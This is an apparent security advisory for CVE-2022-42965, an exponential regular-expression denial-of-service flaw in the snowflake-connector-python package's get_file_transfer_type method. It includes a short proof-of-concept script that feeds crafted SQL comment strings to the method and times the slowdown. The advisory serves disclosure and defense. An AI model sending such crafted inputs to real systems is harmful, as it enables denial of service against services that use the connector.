Headline
CVE-2022-42965: snowflake-connector-python ReDoS | XRAY-257185
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the get_file_transfer_type method
CVE-2022-42965 | CVSS 5.9
JFrog Severity:medium
Published 15 Oct. 2022 | Last updated 15 Oct. 2022
Exponential ReDoS in snowflake-connector-python leads to denial of service
snowflake-connector-python
snowflake-connector-python (,)
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the get_file_transfer_type method
import time
from snowflake.connector.cursor import SnowflakeCursor
for i in range(100):
start_time = time.time()
sql = '/**/\n' + '\t/*/get\t*/\t/**/\n'*i + '\t*/get\n'
SnowflakeCursor.get_file_transfer_type(sql)
print("--- %s seconds ---" % (time.time() - start_time))
No mitigations are supplied for this issue
NVD
Related news
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the get_file_transfer_type method